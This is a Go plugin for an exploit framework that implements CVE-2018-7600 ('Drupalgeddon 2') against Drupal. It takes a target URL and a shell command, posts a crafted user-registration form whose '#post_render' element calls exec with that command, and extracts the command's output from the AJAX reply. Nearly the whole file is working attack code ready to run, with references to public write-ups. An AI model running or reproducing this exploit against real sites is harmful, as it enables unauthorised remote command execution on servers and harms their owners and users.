CVE-2018-7600
package CVE_2018_7600
import (
"context"
"expgo/plugins/api/req"
"expgo/plugins/api/types"
"expgo/plugins/api/util"
"fmt"
"log"
"net/url"
"regexp"
"time"
)
// Plugin metadata read by the plugin registry. All values are plain
// package-level strings so they can be referenced without initialisation.
var (
	pluginType  string = "custom"
	vulType     string = "rce"
	name        string = "CVE-2018-7600"
	component   string = "drupal"
	author      string = "akkuman"
	description string = "Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞"

	// references are the public write-ups this plugin is derived from.
	references []string = []string{
		"https://research.checkpoint.com/uncovering-drupalgeddon-2/",
		"https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md",
	}

	// tags are the search labels the plugin is listed under.
	tags []string = []string{"drupal", "rce"}
)
// opts holds the plugin's option definitions; they are registered in init
// and read back from the params map handed to exploit.
var opts = types.NewOptions()
// init registers the two options this plugin accepts: a required "target"
// (validated as a parsable URL) and a required "cmd" that defaults to "id".
func init() {
	// A target is accepted whenever url.Parse does not reject it. url.Parse
	// is permissive (an empty string parses without error), so this only
	// screens out syntactically malformed values, not unreachable or
	// unintended hosts.
	isParsableURL := func(i interface{}) bool {
		if _, err := url.Parse(i.(string)); err != nil {
			return false
		}
		return true
	}
	opts.String("target", true, "target", "", isParsableURL)
	opts.String("cmd", true, "command", "id")
}
// exploit issues the request built below against params["target"] and
// parses the AJAX reply into a PluginResult.
//
// params must carry "target" and "cmd" as strings (the options registered in
// init); the type assertions panic when either is absent or of another type.
// The outcome is reported as types.HitPluginResult when the 10 s request
// context expires, as Success:true with the extracted text in
// ExtendInfo["data"] when the reply matches the expected marker, and as
// Success:false otherwise. A transport error or a non-200 / empty reply is
// turned into a panic rather than a returned error, so a caller that wants
// an error value has to recover it.
func exploit(ctx context.Context, params map[string]interface{}) types.PluginResult {
	c := req.NewHttpClient(ctx)
	log.Println("准备执行命令...")
	cmd := params["cmd"].(string)
	// The reply is decoded as a JSON array; only the "data" field of the
	// first element is inspected below.
	var result []struct {
		Data string `json:"data"`
	}
	cmd = url.QueryEscape(cmd)
	// NOTE(review): the per-request timeout derives from context.Background,
	// not from ctx, so cancelling ctx does not cancel reqCtx. Whether the
	// client created from ctx still honours that cancellation depends on
	// req.NewHttpClient, which is not visible here.
	reqCtx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
	defer cancel()
	resp, err := c.R().SetContext(reqCtx).
		SetHeader("Content-Type", "application/x-www-form-urlencoded").
		SetResult(&result).
		SetBody(fmt.Sprintf(`form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=%s`, cmd)).
		Post(util.URLJoin(params["target"].(string), "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"))
	// An expired context is reported as a hit (the log line reads
	// "executed successfully or timed out"). This conflates a slow or
	// unreachable host with success, so a Hit from this branch is a weak
	// signal and is not backed by any response data.
	if reqCtx.Err() != nil {
		log.Println("命令执行成功或超时")
		return types.HitPluginResult
	}
	if err != nil {
		panic(err)
	}
	// Only a 200 with at least one decoded element is treated as a usable
	// reply; anything else aborts via panic ("execution failed").
	if resp.StatusCode() != 200 || len(result) == 0 {
		panic("执行失败")
	}
	// Capture everything before the ajax-new-content span in the returned
	// markup (lazy group, so the first span wins). The pattern is recompiled
	// on every call; a package-level regexp.MustCompile would avoid that.
	pattern := regexp.MustCompile(`^(.*?)\<span class="ajax-new-content"\>\<\/span\>`)
	matches := pattern.FindAllStringSubmatch(result[0].Data, -1)
	if len(matches) == 0 || len(matches[0]) < 2 {
		return types.PluginResult{Success: false}
	}
	log.Printf("命令执行结果: %s", matches[0][1])
	return types.PluginResult{
		ExtendInfo: map[string]interface{}{
			"data": matches[0][1],
		},
		Success: true,
	}
}